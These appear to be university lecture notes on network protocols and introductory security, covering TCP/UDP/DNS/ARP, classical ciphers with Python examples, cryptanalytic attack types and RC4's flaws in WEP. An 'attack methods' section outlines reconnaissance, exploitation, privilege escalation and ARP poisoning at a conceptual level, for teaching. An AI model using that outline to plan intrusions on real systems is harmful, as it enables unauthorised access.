TCP: TCP provides a communication service at an intermediate level between an application program and the Internet Protocol (IP). That is, when an application program desires to send a large chunk of data across the Internet using IP, instead of breaking the data into IP-sized pieces and issuing a series of IP requests, the software can issue a single request to TCP and let TCP handle the IP details. TCP provides reliable, ordered delivery of a stream of bytes from one program on one computer to another program on another computer. Besides the Web, other common applications of TCP include e-mail and file transfer. Among its management tasks, TCP controls message size, the rate at which messages are exchanged, and network traffic congestion.

About TCP:
point-to-point: one sender, one receiver
reliable, in-order byte stream: no message boundaries
pipelined: TCP congestion and flow control set the window size
send & receive buffers
full duplex data: bi-directional data flow in the same connection
MSS: maximum segment size, e.g. 1460 bytes or 512 bytes
connection-oriented: handshaking (exchange of control messages) between the initial sender and receiver; state is established before data exchange
flow controlled: the sender will not overwhelm the receiver

A TCP socket is identified by a 4-tuple:
source IP address
source port number
destination IP address
destination port number

UDP - User Datagram Protocol
UDP packet, header structure:

UDP packet, whole packet structure:

About UDP:
"no frills", "bare bones" Internet transport protocol
best effort service: UDP segments may be lost, or delivered out of order to the application
connectionless: no handshaking between UDP sender and receiver; each UDP segment is handled independently of the others
UDP does not guarantee reliability or ordering in the way that TCP does.

Why is there a UDP?
no connection establishment (which can add delay)
simple: no connection state at sender or receiver
small segment header
no congestion control: UDP can blast away as fast as desired
UDP is often used for the delivery of streaming multimedia applications.

A UDP socket is identified by a 2-tuple:
destination IP address
destination port number

When a host receives a UDP segment, it:
checks the destination port number in the segment
directs the UDP segment to the socket with that port number

DHCP - Dynamic Host Configuration Protocol
Allows a host to dynamically obtain its IP address from a network server when it joins the network
Can renew its lease on the address in use
Allows reuse of addresses (a host only holds an address while connected and on)

Overview:
host broadcasts a DHCP discover message
DHCP server responds with a DHCP offer message
host requests an IP address: DHCP request message
DHCP server sends the address: DHCP ack message

How does a network get the subnet part of its IP address? It is allocated a portion of its provider ISP's address space.

ICMP
Used by hosts & routers to communicate network-level information:
error reporting: unreachable host, network, port, protocol
echo request/reply (used by ping)
Network-layer protocol "above" IP: ICMP messages are carried in IP datagrams.
ICMP message: type, code, plus the first 8 bytes of the IP datagram causing the error.

DNS
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource participating in the Internet. It associates various information with domain names assigned to such participants. Most importantly, it translates humanly meaningful domain names to the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices world-wide.

People have many identifiers: TFN, name, passport number.
Internet hosts have:
an IP address (32 bit), used for addressing datagrams, e.g. 121.25.35.67
a name, e.g. www.yahoo.com, used by humans

Domain Name System:
distributed database implemented in a hierarchy of many name servers
application-layer protocol: hosts and name servers communicate to resolve names (address/name translation)
note: a core Internet function, implemented as an application-layer protocol, with the complexity at the network's edge

DNS iterative query:

DNS recursive query:

DNS hybrid query:

ARP
Address Resolution Protocol: In computer networking, the Address Resolution Protocol (ARP) is the method for finding a host's hardware address when only its Network Layer address is known. ARP is not an IP-only or Ethernet-only protocol; it can be used to resolve many different network-layer protocol addresses to hardware addresses, although, due to the overwhelming prevalence of IPv4 and Ethernet, ARP is primarily used to translate IP addresses to Ethernet MAC addresses.

MAC Addresses and ARP:
32-bit IP address: network-layer address, used to get a datagram to the destination IP subnet
MAC (or LAN or physical or Ethernet) address: used to get a frame from one interface to another physically-connected interface (same network); a 48-bit MAC address (for most LANs) is burned into the NIC ROM, and is also sometimes software settable

LAN Addresses and ARP:

MAC address allocation is administered by the IEEE
A manufacturer buys a portion of the MAC address space (to assure uniqueness)
Analogy: a MAC address is like a Social Security Number; an IP address is like a postal address
A MAC address is flat, which gives portability: you can move a LAN card from one LAN to another
An IP address is hierarchical and NOT portable: the address depends on the IP subnet to which the node is attached

Ethernet Frame:

Hubs Versus Switches


Ethernet - Spans the Physical and Data Link Layers of the OSI model. It uses frames to transport information within a Local Area Network.
Hubs - Stupid: they allow collisions, offer no privacy or security, and can be made to crash one another by creating an infinite loop. Plug in and receive everything.
Switches - Slightly smarter than hubs. They don't forward on all ports and as such offer some security and privacy protections. They are used in internal networks. Plug in and receive only the messages addressed to you.
Routers - Much smarter. They forward on specific ports according to an internal routing table and use a buffer to store messages when they receive faster than they can transmit (thus, they can still be DoS-ed, just not as quickly). Routers are used as gateways to the outside world.

This is a basic image of a network routing scheme.

Week3/NiceNotes
Confidentiality with Secret Keys

Classical Techniques
Various techniques make a cipher more difficult to break:
Multiple ciphers
Different languages
Rolling ciphers
One-time pad (impossible to break if the pad is random, secret and never reused)
Increase granularity (block size), for instance using the Playfair cipher
Non-deterministic ciphers, which have various possible outputs for a given input. For instance, add extra characters to the alphabet and randomly choose which corresponding one to use when encoding. This breaks frequency analysis (sort of: you can still break this once the text gets very large!)
Double-enciphering - use a structure-breaking transformation between plaintext and ciphertext
Compression before encryption - reduces or destroys data redundancy, but watch for known-plaintext attacks: the header of a compressed file is well-known!

Substitution and Transposition
Transposition: Transposition or permutation ciphers hide the message contents by rearranging the order of the letters.
Substitution: Units of plaintext are substituted with ciphertext according to a regular system; the "units" may be single letters (the most common), pairs of letters, triplets of letters, mixtures of the above, and so forth. The receiver deciphers the text by performing an inverse substitution.
A cipher is monoalphabetic when only one substitution/transposition is used, or polyalphabetic when several substitutions/transpositions are used.

The solution of a substitution cipher generally progresses through the following stages:
Analysis of the cryptogram(s)
1. Preparation of a frequency table.
2. Search for repetitions.
3. Determination of the type of system used.
4. Preparation of a work sheet.
5. Preparation of individual alphabets (if more than one).
6. Tabulation of long repetitions and peculiar letter distributions.
Classification of vowels and consonants by a study of:
1. Frequencies
2. Spacing
3. Letter combinations
4. Repetitions
Identification of letters
1. Breaking in, or wedge process.
2. Verification of assumptions.
3. Filling in good values throughout messages.
4. Recovery of new values to complete the solution.
Reconstruction of the system
1. Rebuilding the enciphering table.
2. Recovery of the key(s) used in the operation of the system.
3. Recovery of the key or keyword(s) used to construct the alphabet sequences.

Confusion and Diffusion
Confusion: Obscures the relationship between the plaintext message and the ciphertext. This frustrates attempts to study the ciphertext looking for redundancies and statistical patterns. The easiest way to do this is through substitution. A simple example is the Caesar cipher, in which every occurrence of a given plaintext letter is replaced by the same ciphertext letter. Modern substitution ciphers are much more complex: a long block of plaintext is substituted for a different block of ciphertext, and the mechanics of the substitution change with each bit in the plaintext or key. This type of substitution is not necessarily enough, e.g. the German Enigma is a complex substitution algorithm that was broken during WWII. A good confusion cipher ensures that data at a given position in the plaintext doesn't correspond too closely to information at the same position in the ciphertext.

Diffusion: Dissipates the redundancy of the plaintext by spreading it out over the ciphertext. A cryptanalyst looking for those redundancies will have a harder time finding them. The simplest way to cause diffusion is through transposition (also called a permutation). A simple transposition cipher, like columnar transposition, simply rearranges the letters of the plaintext. Modern ciphers do this type of permutation but they also employ other forms of diffusion that can diffuse parts of the message throughout the entire message. A good diffusion cipher ensures that even small changes in the plaintext result in large changes to the ciphertext.

Stream ciphers ('one at a time') rely on confusion alone, although some feedback schemes add diffusion. Block ciphers ('chunk at a time') use both confusion and diffusion. As a general rule, diffusion alone is easily cracked (although double transposition ciphers hold up better than many other pencil-and-paper systems).

Steganography: The art and science of writing hidden messages in such a way that no one apart from the sender and intended recipient even realizes there is a hidden message. It is one way of keeping confidentiality, by keeping the existence of the message hidden. It is an example of security through obscurity: once someone finds out what you have done, it's worth nothing. Examples include:
Greeks wrote messages on a board in pen, then put wax on the board and wrote an innocuous message on the wax to keep the original hidden.
Writing messages on a slave's head, and letting the hair grow out.
Germans wrote messages in newspapers by putting pinholes in them, which could be read by holding the paper up to the light.

Caesar Cipher

Caesar cipher: a simple substitution that shifts the entire alphabet by a fixed distance, so there are only 26 possible keys (a general monoalphabetic substitution, by contrast, has an upper bound of 26! keys). It is a monoalphabetic cipher, reputedly used by Julius Caesar. To use the Caesar cipher you simply replace each letter of the message by a letter a fixed distance away, e.g. use the 3rd letter on.
Example
Ciphertext: L FDPH L VDZ L FRQTXHUHG
Plaintext:  I CAME I SAW I CONQUERED

i.e. the mapping is
Plain:  ABCDEFGHIJKLMNOPQRSTUVWXYZ
Cipher: DEFGHIJKLMNOPQRSTUVWXYZABC

You can describe this cipher as:
Encryption: $E_k(i) = (i + k) \bmod 26$
Decryption: $D_k(i) = (i - k) \bmod 26$

Cryptanalysis of the Caesar Cipher
There are only 26 possible ciphers, so you could simply try each in turn (exhaustive key search):
GDUCUGQFRMPCNJYACJCRRCPQ
HEVDVHRGSNQDOKZBDKDSSDQR
IFWEWISHTOREPLACELETTERS (Plain)
JGXFXJTIUPSFQMBDFMFUUFST
KHYGYKUJVQTGRNCEGNGVVGTU
LIZHZLVKWRUHSODFHOHWWHUV (Cipher)
MJAIAMWLXSVITPEGIPIXXIVW
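The shift cipher and the exhaustive key search described above can be sketched in a few lines of Python. This is only an illustrative sketch: the function names (`caesar_shift`, `caesar_encrypt`, `caesar_decrypt`, `brute_force`) are made up for this example, and it assumes messages use only the letters A-Z, passing any other character through unchanged.

```python
import string

ALPHABET = string.ascii_uppercase


def caesar_shift(text, k):
    """Shift each letter A-Z by k positions (mod 26); leave other characters alone."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + k) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_encrypt(plaintext, k):
    # E_k(i) = (i + k) mod 26
    return caesar_shift(plaintext, k)


def caesar_decrypt(ciphertext, k):
    # D_k(i) = (i - k) mod 26
    return caesar_shift(ciphertext, -k)


def brute_force(ciphertext):
    """Exhaustive key search: return (key, candidate plaintext) for all 26 keys."""
    return [(k, caesar_decrypt(ciphertext, k)) for k in range(26)]


print(caesar_encrypt("I CAME I SAW I CONQUERED", 3))
for key, guess in brute_force("LIZHZLVKWRUHSODFHOHWWHUV"):
    print(key, guess)
```

A human (or a dictionary check) then picks the one candidate out of 26 that reads as English.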

Letter frequency analysis can also be used. The most common letters and letter groups in English are:

Single letter: E T R N I O A S
Double letter: TH HE IN ER RE ON AN EN
Triple letter: THE AND TIO ATI FOR THA TER RES

These ciphers are easy to crack because there is a lot of redundancy and predictability in English: if you miss a few words, you can still reconstruct the sentence. We can use frequency analysis, as long as the language the text is written in is susceptible to that approach (e.g. this is easy in English and German, but hard in Chinese). With a simple substitution cipher, frequency analysis works because the frequency characteristics of the original letters are passed on to the new letters. We need to know the average frequency of every letter in the language; then we count the occurrences of each symbol in the encrypted text and use this information to find the mapping for very common and very uncommon letters.

English Character Frequencies

In most languages letters are not equally common
In English, E is by far the most common letter
There are tables of single, double & triple letter frequencies
These are different for different languages
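As a rough sketch of the counting step described above, the following Python counts letter frequencies in a ciphertext and guesses a Caesar shift by assuming the most common ciphertext letter stands for E. The function names are hypothetical, and the "most common letter is E" assumption is only a heuristic that tends to work on reasonably long English text; short messages can easily mislead it.

```python
from collections import Counter
import string


def letter_frequencies(text):
    """Return {letter: relative frequency} for the letters A-Z found in text."""
    letters = [c for c in text.upper() if c in string.ascii_uppercase]
    if not letters:
        raise ValueError("text contains no letters")
    counts = Counter(letters)
    return {letter: n / len(letters) for letter, n in counts.items()}


def guess_caesar_shift(ciphertext, assumed_plain="E"):
    """Guess the shift by mapping the most common ciphertext letter to assumed_plain."""
    freqs = letter_frequencies(ciphertext)
    most_common = max(freqs, key=freqs.get)
    return (ord(most_common) - ord(assumed_plain)) % 26


cipher = "LIZHZLVKWRUHSODFHOHWWHUV"
print(sorted(letter_frequencies(cipher).items(), key=lambda kv: -kv[1])[:3])
print("guessed shift:", guess_caesar_shift(cipher))
```

For a general substitution cipher the same counts are compared against the single, double and triple letter tables rather than reduced to a single shift.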

Vigenere Cipher
Vigenère cipher: a generalisation of the Caesar cipher. It is a polyalphabetic cipher that encodes using several shifted alphabets selected by a keyword. It is vulnerable to frequency attacks (once the keyword length has been found). In a Caesar cipher, each letter of the alphabet is shifted along some number of places; for example, in a Caesar cipher of shift 3, A would become D, B would become E and so on. The Vigenère cipher consists of several Caesar ciphers in sequence with different shift values.

To encipher, a table of alphabets can be used, termed a tabula recta, Vigenère square, or Vigenère table. It consists of the alphabet written out 26 times in different rows, each alphabet shifted cyclically to the left compared to the previous alphabet, corresponding to the 26 possible Caesar ciphers. At different points in the encryption process, the cipher uses a different alphabet from one of the rows. The alphabet used at each point depends on a repeating keyword. For example, suppose that the plaintext to be encrypted is:
ATTACKATDAWN

The person sending the message chooses a keyword and repeats it until it matches the length of the plaintext, for example, the keyword "LEMON":
LEMONLEMONLE

The first letter of the plaintext, A, is enciphered using the alphabet in row L, which is the first letter of the key. This is done by looking at the letter in row L and column A of the Vigenère square, namely L. Similarly, for the second letter of the plaintext, the second letter of the key is used; the letter at row E and column T is X. The rest of the plaintext is enciphered in a similar fashion:
Plaintext:  ATTACKATDAWN
Key:        LEMONLEMONLE
Ciphertext: LXFOPVEFRNHR

Decryption is performed by finding the position of the ciphertext letter in a row of the table, and then taking the label of the column in which it appears as the plaintext. For example, in row L, the ciphertext L appears in column A, which is taken as the first plaintext letter. The second letter is decrypted by looking up X in row E of the table; it appears in column T, which is taken as the plaintext letter.

Vigenère can also be viewed algebraically. If the letters A-Z are taken to be the numbers 0-25, and addition is performed modulo 26, then Vigenère encryption can be written
$C_i = (P_i + K_i) \bmod 26$
and decryption
$P_i = (C_i - K_i) \bmod 26$
where $P_i$, $C_i$ and $K_i$ are the $i$-th letters of the plaintext, the ciphertext and the repeated keyword.
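The algebraic view (add the key letter modulo 26 to encrypt, subtract it to decrypt) translates almost directly into code. The sketch below is illustrative only: the function name `vigenere` and its `decrypt` flag are choices made for this example, and it assumes an A-Z alphabet with non-letters passed through without consuming a key letter.

```python
from itertools import cycle


def vigenere(text, key, decrypt=False):
    """Vigenere cipher over A-Z: add (or subtract) the repeating key letter mod 26."""
    sign = -1 if decrypt else 1
    key_stream = cycle(key.upper())  # repeat the keyword as often as needed
    out = []
    for ch in text.upper():
        if "A" <= ch <= "Z":
            k = ord(next(key_stream)) - ord("A")
            p = ord(ch) - ord("A")
            out.append(chr((p + sign * k) % 26 + ord("A")))
        else:
            out.append(ch)  # assumption: leave spaces/punctuation untouched
    return "".join(out)


ciphertext = vigenere("ATTACKATDAWN", "LEMON")
print(ciphertext)
print(vigenere(ciphertext, "LEMON", decrypt=True))
```

Each position in the keyword acts as an independent Caesar cipher, which is why the cipher falls to frequency analysis once the keyword length is known.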

Playfair Cipher
The Playfair cipher or Playfair square is a manual symmetric encryption technique. The Playfair cipher encrypts pairs of letters (digraphs), instead of single letters. This is significantly harder to break since the frequency analysis used for simple substitution ciphers is considerably more difficult.

Example
To encipher a message in Playfair, pick a keyword and write it into a five-by-five square, omitting repeated letters and replacing J with I. In this example, we use the keyword MANCHESTER and write it into the square by rows. Follow the keyword with the rest of the alphabet's letters in alphabetical order.
M A N C H
E S T R B
D F G I K
L O P Q U
V W X Y Z

First we need to prepare the plaintext message for encryption. To encrypt "This secret message is encrypted", break it up into capitalised two-letter groups. If both letters in a pair are the same, insert an X between them. If there is only one letter in the last group (odd number of letters), add an X to it. Replace J with I.
TH IS SE CR ET ME SX SA GE IS EN CR YP TE DX

The cipher replaces pairs of letters. The rules for encrypting are:
1. If the letters appear on the same row of your (key) table, replace them with the letters to their immediate right respectively, wrapping around to the left side of the row if necessary. For example, using the table above, the letter pair FK would be encoded as GD.
2. If the letters appear on the same column of your (key) table, replace them with the letters immediately below, wrapping around to the top if necessary. For example, using the table above, the letter pair SO would be encoded as FW.
3. If the letters are on different rows and columns, replace them with the letters on the same row respectively but at the other pair of corners of the rectangle defined by the original pair. The order is important - the first letter of the pair should be replaced first. For example, using the table above, the letter pair AR would be encoded as CS.

Now we encrypt each two-letter group. The first pair of letters to encrypt is T and H. Find the T and H in the (key) square.
. . N . H
. . T . B
. . . . .
. . . . .
. . . . .

Replace TH with the letters at the other two corners, starting with the letter on the same row as the first letter of the pair: TH becomes BN. Continue this process with each pair of letters:
Plaintext:  TH IS SE CR ET ME SX SA GE IS EN CR YP TE DX
Ciphertext: BN FR

Notice that S and E are in the same row.
. . . . .
E S T . .
. . . . .
. . . . .
. . . . .

In this case we take the letter immediately to the right of each letter of the pair, so that SE becomes TS.
Plaintext:  TH IS SE CR ET ME SX SA GE IS EN CR YP TE DX
Ciphertext: BN FR TS

Now we see that C and R are in the same column.
. . . C .
. . . R .
. . . I .
. . . . .
. . . . .

Use the letter immediately below each of these letters, so that CR becomes RI. This is the last special case, and the encryption proceeds without further incident.
Plaintext:  TH IS SE CR ET ME SX SA GE IS EN CR YP TE DX
Ciphertext: BN FR TS RI SR ED TW FS DT FR TM RI XQ RS GV

To decrypt the message, simply reverse the process: If the two letters are in different rows and columns, take the letters in the opposite corners of their rectangle. If they are in the same row, take the letters to the left. If they are in the same column, take the letters above each of them.
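The Playfair rules can be sketched in Python as below. This is a minimal sketch under a few assumptions: the helper names (`build_square`, `prepare`, `encrypt_pair`, `playfair_encrypt`) are invented for this example, the square is filled by rows from the keyword, J is merged into I, and X is used as the filler letter (a plaintext containing "XX" would need a different filler and is not handled).

```python
def build_square(keyword):
    """Fill a 5x5 square by rows: keyword first, then the rest of the alphabet (no J)."""
    seen = []
    for ch in (keyword + "ABCDEFGHIKLMNOPQRSTUVWXYZ").upper().replace("J", "I"):
        if ch.isalpha() and ch not in seen:
            seen.append(ch)
    return [seen[r * 5:(r + 1) * 5] for r in range(5)]


def prepare(plaintext):
    """Split into digraphs, inserting X between doubled letters and padding the end."""
    letters = [c for c in plaintext.upper().replace("J", "I") if c.isalpha()]
    pairs, i = [], 0
    while i < len(letters):
        first = letters[i]
        if i + 1 < len(letters) and letters[i + 1] != first:
            pairs.append(first + letters[i + 1])
            i += 2
        else:
            pairs.append(first + "X")  # doubled letter, or a lone last letter
            i += 1
    return pairs


def encrypt_pair(square, pair):
    pos = {square[r][c]: (r, c) for r in range(5) for c in range(5)}
    (r1, c1), (r2, c2) = pos[pair[0]], pos[pair[1]]
    if r1 == r2:   # same row: take the letters to the right, wrapping around
        return square[r1][(c1 + 1) % 5] + square[r2][(c2 + 1) % 5]
    if c1 == c2:   # same column: take the letters below, wrapping around
        return square[(r1 + 1) % 5][c1] + square[(r2 + 1) % 5][c2]
    # rectangle: keep each letter's row, swap the columns
    return square[r1][c2] + square[r2][c1]


def playfair_encrypt(plaintext, keyword):
    square = build_square(keyword)
    return " ".join(encrypt_pair(square, p) for p in prepare(plaintext))


print(playfair_encrypt("This secret message is encrypted", "MANCHESTER"))
```

Decryption uses the same square with the row and column steps reversed (left instead of right, above instead of below); the rectangle rule is its own inverse.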

Attack Methods
1. Kevin Mitnick attack on Shimomura
TCP sequence number prediction attack against the work machine; it only worked because it was a low-traffic time period
DoS attack against the home machine so that it can't annihilate the shadow connection
KM spoofing
Leverages the insecure (IP-address-based) authentication of the RLOGIN system

2. Access Control principles
deny by default: allow only what's absolutely necessary
role based: group users into 'roles'; access control becomes less ad-hoc and more manageable
authentication
  definition: proving your identity to a system, such that you can exercise the rights granted by the security configuration of that system
  1. something you know
  2. something you have
  3. something you are
rsa

Anatomy of an attack
Beforehand
Gather Information: Do passive recon (you cannot get caught) or active recon (you can get caught), e.g. Google searches, trash bins, port scans. Active means getting your hands dirty, whilst passive means non-detectable actions like listening to a phone conversation of someone on a bus. Note that going through someone's rubbish wearing gloves is not passive, as you are directly interfering.
Surveillance: What programs is your target running? What time does everyone leave? Is there an easy way to get passwords? What exploits can an attacker use? For example, if you can find out they are using an outdated version of the unix utility finger, it has a 1024 character long, unchecked buffer which can be exploited.

Intermediate surveillance
Keep a database of identities with statistics on their systems. nmap can produce identity databases (remember the legal issues). nmap floods a machine with packets; it's not a passive thing. Don't do this without telling people.

Start the attack
Do your exploit. Get user access. Then conduct some privilege escalation to obtain root access. This is often done by exploiting further vulnerabilities. The ultimate aim is to gain local access and then escalate privileges.

Example: Try to see what software and versions they are running. Find out when people are distracted. What are the interesting machines?
Recon: either passive or active. Look for errors; sometimes an error message will reveal a version number. Ideally you would do passive surveillance; if you do active surveillance there is more chance of you getting caught or tripping an alarm.
There are 2 different ways:
You've seen through the exploit lab/seminar that if you are given access to a machine, you can run an exploit to spawn a shell. Then you get access to the machine and its programs as a legitimate user, and from there you could try privilege escalation (if you are able to run a program as root and then spawn a shell, you have root access).
Brute force - just finger thousands of machines, and a small percentage of them would likely be vulnerable.

Technical Attacks
3 stages:
reconnaissance: finding out how the system works
penetration: gaining access to the system
privilege escalation: converting that access to a kind where you can do nefarious things

Most modern computers are based on a 'von Neumann' architecture: there is no difference between data and code. C trusts whatever code it's executing, so it is easy to overwrite important execution data: the buffer overflow attack.

Side Channel Attacks
A side-channel is a channel that occurs as a side-effect of the 'main' channel. In cryptography, the main channel is the encryption/decryption algorithm, and the side channels are pieces of information given away by the specific implementation of the algorithm. While the information inside the main channel (i.e. the plaintext and key) does not directly leak into a side channel, the side channel contains meta-information about the main channel.
Example: an attacker may not be able to crack an encrypted file (the main channel). However, the size of the encrypted file is a side-channel that may be related to the size of the original file. Combining this information with other side-channels (e.g. the file name, when it was created, who created it), an attacker may be able to deduce the nature of the original file, or even narrow down the possible keys used to encrypt it.

Substitution Man-In-The-Middle Attack
A man-in-the-middle attack is one in which a third party sits in the middle of a communication between a sender and a receiver and is able to read, view and/or modify the data being sent. The substitution attack can be performed against a synchronised stream cipher without having to know the key. In this attack the attacker can substitute a piece of information A for another piece of information B if they know where A occurs in the stream of bits.
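The substitution attack relies only on XOR being its own inverse, which a short Python sketch makes concrete. The function names (`xor_bits`, `substitute`) and the three-bit values are illustrative assumptions; bit strings are used instead of bytes purely for readability.

```python
def xor_bits(a, b):
    """XOR two equal-length strings of '0'/'1' characters."""
    if len(a) != len(b):
        raise ValueError("bit strings must have the same length")
    return "".join("1" if x != y else "0" for x, y in zip(a, b))


def substitute(ciphertext, known_plain, replacement):
    """Attacker's step: swap known_plain for replacement without knowing the key."""
    # ciphertext XOR known plaintext reveals the keystream bits at that position
    keystream_bits = xor_bits(ciphertext, known_plain)
    # re-encrypt the replacement under the recovered keystream bits
    return xor_bits(keystream_bits, replacement)


keystream = "110"              # known only to sender and receiver
info_a, info_b = "101", "011"  # attacker knows A and wants B delivered instead

sent = xor_bits(info_a, keystream)          # what the sender transmits
forged = substitute(sent, info_a, info_b)   # what the attacker forwards
received = xor_bits(forged, keystream)      # what the receiver decrypts

print(sent, forged, received)
```

The receiver decrypts the forged message to B and has no way of noticing the change, which is why a stream cipher on its own provides confidentiality but not integrity.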
Example
For simplicity, let's say the information A is 101, the information B is 011, and the key is some three-bit stream that has been mangled to be 110.
The encoder sending information A XORs its bits with the mangled key to send the message: 110 XOR 101, which results in 011.
Then the attacker, without knowing the key, XORs the sent message with information A: 011 XOR 101, which results in 110.
Then the attacker combines this with their information B using XOR: 110 XOR 011, which results in 101.
This is sent down the line and decoded as B (101 XOR 110 = 011). This is all done without having to know the key.

Cryptanalytic Attack

The following table describes types of cryptanalytic attack, where: P is plaintext, C is ciphertext, E is an encryption function, D is the corresponding decryption function, and k is a key.

General Types of Cryptanalytic Attack

Ciphertext-only attack
Required: Ciphertext of several messages, which have been encrypted with the same encryption algorithm.
Purpose: Recover the plaintext of as many messages as possible, or deduce the key(s) used to encrypt messages, in order to decrypt other messages encrypted with the same algorithm.
Formula: Given $C_1 = E_k(P_1), C_2 = E_k(P_2), \ldots, C_i = E_k(P_i)$, deduce $P_1, P_2, \ldots, P_i$; $k$; or an algorithm to infer $P_{i+1}$ from $C_{i+1} = E_k(P_{i+1})$.

Known-plaintext attack
Required: Ciphertext of several messages, as well as the plaintext associated with these messages.
Purpose: Deduce the key(s) used to encrypt messages, or an algorithm to decrypt new messages encrypted with the same key(s).
Formula: Given $P_1, C_1 = E_k(P_1), P_2, C_2 = E_k(P_2), \ldots, P_i, C_i = E_k(P_i)$, deduce either $k$, or an algorithm to infer $P_{i+1}$ from $C_{i+1} = E_k(P_{i+1})$.

Chosen-plaintext attack
Required: Ciphertext of several messages (and associated plaintext), but also the ability to choose which plaintext gets encrypted (and hence, the ability to tailor attacks to find out more about the key).
Purpose: Deduce the key(s) used to encrypt messages, or an algorithm to decrypt new messages encrypted with the same key(s).
Formula: Given $P_1, C_1 = E_k(P_1), P_2, C_2 = E_k(P_2), \ldots, P_i, C_i = E_k(P_i)$, where the cryptanalyst gets to choose $P_1, P_2, \ldots, P_i$, deduce either $k$, or an algorithm to infer $P_{i+1}$ from $C_{i+1} = E_k(P_{i+1})$.

Adaptive-chosen-plaintext attack (special case of chosen-plaintext attack)
Required: Ciphertext of several messages (and associated plaintext), and the ability to choose which plaintext gets encrypted, as well as the ability to modify the choice of plaintext based on the results of the previous encryption.
Purpose: Deduce the key(s) used to encrypt messages, or an algorithm to decrypt new messages encrypted with the same key(s).
Formula: Given $P_1, C_1 = E_k(P_1), P_2, C_2 = E_k(P_2), \ldots, P_i, C_i = E_k(P_i)$, where the cryptanalyst gets to choose $P_1, P_2, \ldots, P_i$, deduce either $k$, or an algorithm to infer $P_{i+1}$ from $C_{i+1} = E_k(P_{i+1})$.

Other Types of Cryptanalytic Attack

Chosen-ciphertext attack
Required: The ability to choose different ciphertexts to be decrypted, and access to the decrypted plaintext.
Purpose: Deduce the key.
Formula: Given $C_1, P_1 = D_k(C_1), C_2, P_2 = D_k(C_2), \ldots, C_i, P_i = D_k(C_i)$, deduce $k$.

Chosen-key attack
Required: This doesn't mean you get to choose the key, but that you have information about the relationships between keys.
Purpose: Deduce the key.

Rubber-hose cryptanalysis (bribery is sometimes referred to as a purchase-key attack)
Required: You threaten, blackmail or torture someone so they give you the key.
Purpose: Deduce the key.

Sniffing
A sniffer is a program and/or device that monitors data travelling over a network. Examples of sniffing devices include tiny microphones/cameras and keyloggers.
'Echelon': Since the Patriot Act the NSA has the power to sniff everything. Now everybody's trying to route their traffic around the US.
1. Sniffing a network that uses hubs - A very small Linux computer will do the trick.
2. Switched networks
  Switches are unicast devices
  Need some way to direct traffic
  Address Resolution Protocol (ARP) table poisoning
  ARP poisoning is a type of 'Man-In-The-Middle' attack (one of many sniffing techniques)

Example: Tempest Attack
Read the EMF leakage of computer screens, recombine it and then deduce what is going on.
Dutch intelligence agencies showed that a tempest attack can be used to read electronic voting computer screens.

Week4/NiceNotes
Modern Symmetric Ciphers
Symmetric Key Cryptography, or Secret Key Cryptography, refers to a method where a single key is used for both encryption and decryption. The algorithm used to encrypt the message must also be reversible. The strength of a cipher is how much work is required to break it using brute force. A key of n bits has at most n bits of security. We say an encryption has x bits of strength if it takes O(2^x) operations to break it by brute force. A cipher is considered broken if it can be broken in less than brute force time.

Block ciphers break the input into fixed-size blocks and encrypt each block.
Stream ciphers encrypt the input 'on the fly', usually by XOR-ing the input stream with a cipher stream.

Remember that having a cipher is not all you need; you need to use it in a secure way. A nonce is a number you use once.
Cipher: It's good enough, but that doesn't mean it will never be broken. The strength of the cipher required to protect the information depends heavily on the information itself.
The time importance - Is the information still useful if it's broken tomorrow?
The level of importance - How important is the information?

Example: RC4 as used in WEP. The key is the seed to a 'secure random bit generator', whose output is XOR'd with the input. The recipient uses the same key to generate the same bit stream and XORs it with the ciphertext, producing the plaintext.
Problem: the first few bits were very dependent on the key, so it was easy to break.
Possible solution: padding, i.e. throw away the first 50 or so bytes.
The reason WEP attacks were so easy was not a problem with RC4 itself, but a problem with the particular way RC4 was used in WEP. For every single frame it sent, WEP re-started the random generator, which gives away information about the key. WEP is an example of a badly implemented cipher.

Problems with RC4
The first weakness is the existence of large classes of weak keys, in which a small part of the secret key determines a large number of bits of the initial permutation (KSA output). In addition, the Pseudo Random Generation Algorithm (PRGA) translates these patterns in the initial permutation into patterns in the prefix of the output stream, and thus RC4 has the undesirable property that for these weak keys its initial outputs are disproportionally affected by a small number of key bits.
The second weakness is a related key vulnerability, which applies when part of the key presented to the KSA is exposed to the attacker. It consists of the observation that when the same secret part of the key is used with numerous different exposed values, an attacker can rederive the secret part by analyzing the initial word of the keystreams with relatively little work. This concatenation of a long term secret part with an attacker visible part is a commonly used mode of RC4, and in particular it is used in the WEP (Wired Equivalent Privacy) protocol, which protects many wireless networks.
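To make the KSA and PRGA concrete, here is a compact sketch of RC4 in Python, written from the commonly published description of the algorithm. It is for study only (RC4 should not be used to protect real data), and the `drop` parameter is an assumption added for this example to illustrate the "throw away the first bytes" mitigation mentioned above.

```python
def rc4_keystream(key):
    """Yield RC4 keystream bytes for the given key (a non-empty bytes object)."""
    # KSA: key-scheduling algorithm builds the initial permutation S
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # PRGA: pseudo-random generation algorithm emits one byte per step
    i = j = 0
    while True:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) % 256]


def rc4(key, data, drop=0):
    """XOR data with the RC4 keystream, optionally discarding the first `drop` bytes."""
    stream = rc4_keystream(key)
    for _ in range(drop):
        next(stream)  # discard early keystream bytes, which depend strongly on the key
    return bytes(b ^ next(stream) for b in data)


ciphertext = rc4(b"Key", b"Plaintext")
print(ciphertext.hex())
print(rc4(b"Key", ciphertext))  # the same operation decrypts
```

Because encryption and decryption are the same XOR, both sides must use the same key and the same `drop` value, and must never reuse a keystream for two messages.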

Keys
Shared, secret key: With this form of cryptography, it is obvious that the key must be known to both the sender and the receiver; that, in fact, is the secret (i.e. there must be a shared, secret key). The biggest difficulty with this approach, of course, is the distribution of the key. Disadvatage: One disadvantage of symmetric-key algorithms is the requirement of a shared secret key, with one copy at each end. The process of selecting, distributing and storing keys is known as key management, and is difficult to achieve reliably and securely.

Problems With Keys:
Managing keys: If there is a group of n people and each pair wants a unique key to use in a Symmetric Key System, then the number of keys in the system is n(n-1)/2. This is quadratic growth, so as n increases the keys become unmanageable and hard to keep secret. In a secure Asymmetric Key System the number of keys grows linearly with n.
